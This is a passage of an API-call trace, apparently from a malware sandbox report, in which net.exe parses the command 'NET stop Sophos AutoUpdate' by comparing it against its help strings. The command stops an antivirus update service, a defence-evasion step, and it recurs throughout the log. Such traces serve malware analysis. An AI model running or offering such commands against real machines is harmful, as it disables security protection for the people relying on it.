dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x15 [0038.332] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET START MESSENGER\r\n", _MaxCount=0x1d) returned 14 [0038.332] LocalFree (hMem=0x813f78) returned 0x0 [0038.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x15 [0038.332] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET START NET LOGON\r\n", _MaxCount=0x1d) returned 14 [0038.332] LocalFree (hMem=0x813f78) returned 0x0 [0038.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x16 [0038.332] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1d) returned 14 [0038.332] LocalFree (hMem=0x813f78) returned 0x0 [0038.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x11 [0038.333] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET START RPCSS\r\n", _MaxCount=0x1d) returned 14 [0038.333] LocalFree (hMem=0x813f78) returned 0x0 [0038.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x14 [0038.333] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1d) returned 14 [0038.333] LocalFree (hMem=0x813f78) returned 0x0 [0038.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x12 [0038.333] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET START SERVER\r\n", _MaxCount=0x1d) returned 14 [0038.333] LocalFree (hMem=0x813f78) returned 0x0 [0038.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0xf [0038.333] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET START UPS\r\n", _MaxCount=0x1d) returned 14 [0038.333] LocalFree (hMem=0x813f78) returned 0x0 [0038.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x17 [0038.333] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1d) returned 14 [0038.333] LocalFree (hMem=0x813f78) returned 0x0 [0038.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x18 [0038.333] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1d) returned 14 [0038.333] LocalFree (hMem=0x813f78) returned 0x0 [0038.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x2a [0038.333] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET STATISTICS\r\n[WORKSTATION ", _MaxCount=0x1d) returned 14 [0038.333] LocalFree (hMem=0x813f78) returned 0x0 [0038.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x15 [0038.333] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1d) returned 19 [0038.333] LocalFree (hMem=0x813f78) returned 0x0 [0038.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0x58 [0038.333] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET TIME\r\n\r\n[\\\\computername |", _MaxCount=0x1d) returned -1 [0038.333] LocalFree (hMem=0x815868) returned 0x0 [0038.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0x184 [0038.333] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET USE\r\n[devicename | *] [\\\\", _MaxCount=0x1d) returned -2 [0038.333] LocalFree (hMem=0x815868) returned 0x0 [0038.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0xc7 [0038.333] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET USER\r\n[username [password", _MaxCount=0x1d) returned -2 [0038.333] LocalFree (hMem=0x815868) returned 0x0 [0038.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0x47 [0038.333] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET VIEW\r\n[\\\\computername [/C", _MaxCount=0x1d) returned -3 [0038.333] LocalFree (hMem=0x815868) returned 0x0 [0038.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0xc2 [0038.334] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET\r\n [ ACCOUNTS | COMPUTE", _MaxCount=0x1d) returned 19 [0038.334] LocalFree (hMem=0x815868) returned 0x0 [0038.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0x319 [0038.334] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="SERVICES\r\nNET START can be us", _MaxCount=0x1d) returned -5 [0038.334] LocalFree (hMem=0x815868) returned 0x0 [0038.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0x483 [0038.334] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="SYNTAX\r\nThe following convent", _MaxCount=0x1d) returned -5 [0038.334] LocalFree (hMem=0x815868) returned 0x0 [0038.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0xa86 [0038.334] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NAMES\r\nThe following types of", _MaxCount=0x1d) returned 4 [0038.334] LocalFree (hMem=0x815868) returned 0x0 [0038.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0x54 [0038.334] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="\r\nFor more information on too", _MaxCount=0x1d) returned 97 [0038.334] LocalFree (hMem=0x815868) returned 0x0 [0038.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0xad [0038.334] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0038.334] LocalFree (hMem=0x815868) returned 0x0 [0038.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x2e [0038.334] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0038.334] LocalFree (hMem=0x813f78) returned 0x0 [0038.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0x7d [0038.334] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0038.334] LocalFree (hMem=0x815868) returned 0x0 [0038.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x26 [0038.334] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0038.334] LocalFree (hMem=0x813f78) returned 0x0 [0038.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x19 [0038.334] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0038.334] LocalFree (hMem=0x813f78) returned 0x0 [0038.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x1b [0038.334] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0038.334] LocalFree (hMem=0x813f78) returned 0x0 [0038.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0xbe [0038.334] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0038.335] LocalFree (hMem=0x815868) returned 0x0 [0038.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x33 [0038.335] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0038.335] LocalFree (hMem=0x813f78) returned 0x0 [0038.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x19 [0038.335] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0038.335] LocalFree (hMem=0x813f78) returned 0x0 [0038.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0xc1 [0038.335] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0038.335] LocalFree (hMem=0x815868) returned 0x0 [0038.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x16 [0038.335] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0038.335] LocalFree (hMem=0x813f78) returned 0x0 [0038.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x33 [0038.335] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0038.335] LocalFree (hMem=0x813f78) returned 0x0 [0038.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0x234 [0038.335] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0038.335] LocalFree (hMem=0x815868) returned 0x0 [0038.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x13 [0038.335] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0038.335] LocalFree (hMem=0x813f78) returned 0x0 [0038.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x14 [0038.335] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0038.335] LocalFree (hMem=0x813f78) returned 0x0 [0038.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x14 [0038.335] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0038.335] LocalFree (hMem=0x813f78) returned 0x0 [0038.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x15 [0038.335] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0038.335] LocalFree (hMem=0x813f78) returned 0x0 [0038.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x15 [0038.335] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0038.335] LocalFree (hMem=0x813f78) returned 0x0 [0038.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x16 [0038.336] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0038.336] LocalFree (hMem=0x813f78) returned 0x0 [0038.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x11 [0038.336] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0038.336] LocalFree (hMem=0x813f78) returned 0x0 [0038.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x14 [0038.336] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0038.336] LocalFree (hMem=0x813f78) returned 0x0 [0038.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x12 [0038.336] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0038.336] LocalFree (hMem=0x813f78) returned 0x0 [0038.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0xf [0038.336] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0038.336] LocalFree (hMem=0x813f78) returned 0x0 [0038.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x17 [0038.336] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0038.336] LocalFree (hMem=0x813f78) returned 0x0 [0038.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x18 [0038.336] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0038.336] LocalFree (hMem=0x813f78) returned 0x0 [0038.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x2a [0038.336] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0038.336] LocalFree (hMem=0x813f78) returned 0x0 [0038.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x15 [0038.336] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0038.336] LocalFree (hMem=0x813f78) returned 0x0 [0038.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4㽸\x814") returned 0x58 [0038.336] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0038.336] LocalFree (hMem=0x819868) returned 0x0 [0038.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4顨\x814") returned 0x184 [0038.336] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0038.336] LocalFree (hMem=0x819868) returned 0x0 [0038.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4顨\x814") returned 0xc7 [0038.337] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0038.337] LocalFree (hMem=0x819868) returned 0x0 [0038.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4顨\x814") returned 0x47 [0038.337] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0038.337] LocalFree (hMem=0x819868) returned 0x0 [0038.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4顨\x814") returned 0xc2 [0038.337] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0038.337] LocalFree (hMem=0x819868) returned 0x0 [0038.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4顨\x814") returned 0x319 [0038.337] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0038.337] LocalFree (hMem=0x819868) returned 0x0 [0038.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4顨\x814") returned 0x483 [0038.337] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0038.337] LocalFree (hMem=0x819868) returned 0x0 [0038.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4顨\x814") returned 0xa86 [0038.337] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0038.337] LocalFree (hMem=0x819868) returned 0x0 [0038.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4顨\x814") returned 0x54 [0038.337] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0038.337] LocalFree (hMem=0x819868) returned 0x0 [0038.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4顨\x814") returned 0xad [0038.337] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0038.337] LocalFree (hMem=0x819868) returned 0x0 [0038.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4顨\x814") returned 0x2e [0038.337] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0038.337] LocalFree (hMem=0x813f78) returned 0x0 [0038.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4㽸\x814") returned 0x7d [0038.338] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0038.338] LocalFree (hMem=0x819868) returned 0x0 [0038.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4顨\x814") returned 0x26 [0038.338] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0038.338] LocalFree (hMem=0x813f78) returned 0x0 [0038.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x19 [0038.338] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0038.338] LocalFree (hMem=0x813f78) returned 0x0 [0038.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x1b [0038.338] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0038.338] LocalFree (hMem=0x813f78) returned 0x0 [0038.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4㽸\x814") returned 0xbe [0038.338] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0038.338] LocalFree (hMem=0x819868) returned 0x0 [0038.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4顨\x814") returned 0x33 [0038.338] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0038.338] LocalFree 